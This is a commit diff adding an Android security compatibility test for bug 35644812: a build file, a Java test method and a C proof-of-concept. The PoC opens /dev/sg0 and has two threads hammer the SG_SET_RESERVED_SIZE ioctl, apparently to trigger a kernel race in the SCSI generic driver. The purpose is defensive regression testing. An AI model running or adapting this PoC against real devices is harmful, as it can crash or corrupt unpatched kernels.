CTS/STS test for Android Security b/35644812
Bug: 35644812
Change-Id: I1f19c1e66c665f06ac54d6333e19ebf2f00abbb1
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f208b96..3792861 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -118,6 +118,7 @@
<option name="push" value="Bug-33039685->/data/local/tmp/Bug-33039685" />
<option name="push" value="Bug-35676417->/data/local/tmp/Bug-35676417" />
+ <option name="push" value="Bug-35644812->/data/local/tmp/Bug-35644812" />
<option name="append-bitness" value="true" />
</target_preparer>
diff --git a/hostsidetests/security/securityPatch/Bug-35644812/Android.mk b/hostsidetests/security/securityPatch/Bug-35644812/Android.mk
new file mode 100644
index 0000000..e02559d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644812/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35644812
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35644812/poc.c b/hostsidetests/security/securityPatch/Bug-35644812/poc.c
new file mode 100644
index 0000000..c0ca91f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644812/poc.c
@@ -0,0 +1,106 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+
+#include <string.h>
+
+#include <android/log.h>
+#include <dirent.h>
+#include <dlfcn.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/futex.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/ptrace.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/system_properties.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/un.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+int fd;
+
+void in_cpu() {
+ int num_processors = sysconf(_SC_NPROCESSORS_CONF);
+ cpu_set_t get;
+ int i = 0;
+ CPU_ZERO(&get);
+ sched_getaffinity(0, sizeof(cpu_set_t), &get);
+ for (int i = 0; i < num_processors; i++) {
+ if (CPU_ISSET(i, &get)) {
+ printf("The current thread bound to core %d\n", i);
+ }
+ }
+}
+static void bind_child_to_cpu() {
+ in_cpu();
+ cpu_set_t set;
+ CPU_ZERO(&set);
+ CPU_SET(1, &set);
+ sched_setaffinity(0, sizeof(set), &set);
+ in_cpu();
+}
+
+#define BLKTRACETEARDOWN _IO(0x12, 118)
+#define SG_SET_RESERVED_SIZE 0x2275
+#define SG_GET_RESERVED_SIZE 0x2272
+static void* overwrite(void* param) {
+ int ret;
+ for (int i = 0; i < 100000; i++) {
+ int size = 0x100;
+ int n = ioctl(fd, SG_SET_RESERVED_SIZE, &size);
+ printf("ioctl error =%d %s\n", n, strerror(errno));
+ }
+ return param;
+}
+
+int functionOne() {
+ sleep(2);
+ char filename[128];
+ strcpy(filename, "/dev/sg0");
+
+ fd = open(filename, 2);
+ if (fd == -1) {
+ return -1;
+ }
+
+ pthread_t thread0;
+ for (int i = 0; i < 2; i++) {
+ if (pthread_create(&thread0, NULL, overwrite, NULL))
+ perror("overwritethread pthread_create()");
+ }
+
+ return 0;
+}
+
+int main(int argc, char** argv, char** env) { return functionOne(); }
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_09.java b/hostsidetests/security/src/android/security/cts/Poc17_09.java
index 051c589..fbda89c 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_09.java
@@ -42,4 +42,15 @@
AdbUtils.runPocNoOutput("Bug-35676417", getDevice(), 60);
}
}
+
+ /**
+ * b/35644812
+ */
+ @SecurityTest
+ public void testPocBug_35644812() throws Exception {
+ enableAdbRoot(getDevice());
+ if (containsDriver(getDevice(), "/dev/sg0")) {
+ AdbUtils.runPocNoOutput("Bug-35644812", getDevice(), 60);
+ }
+ }
}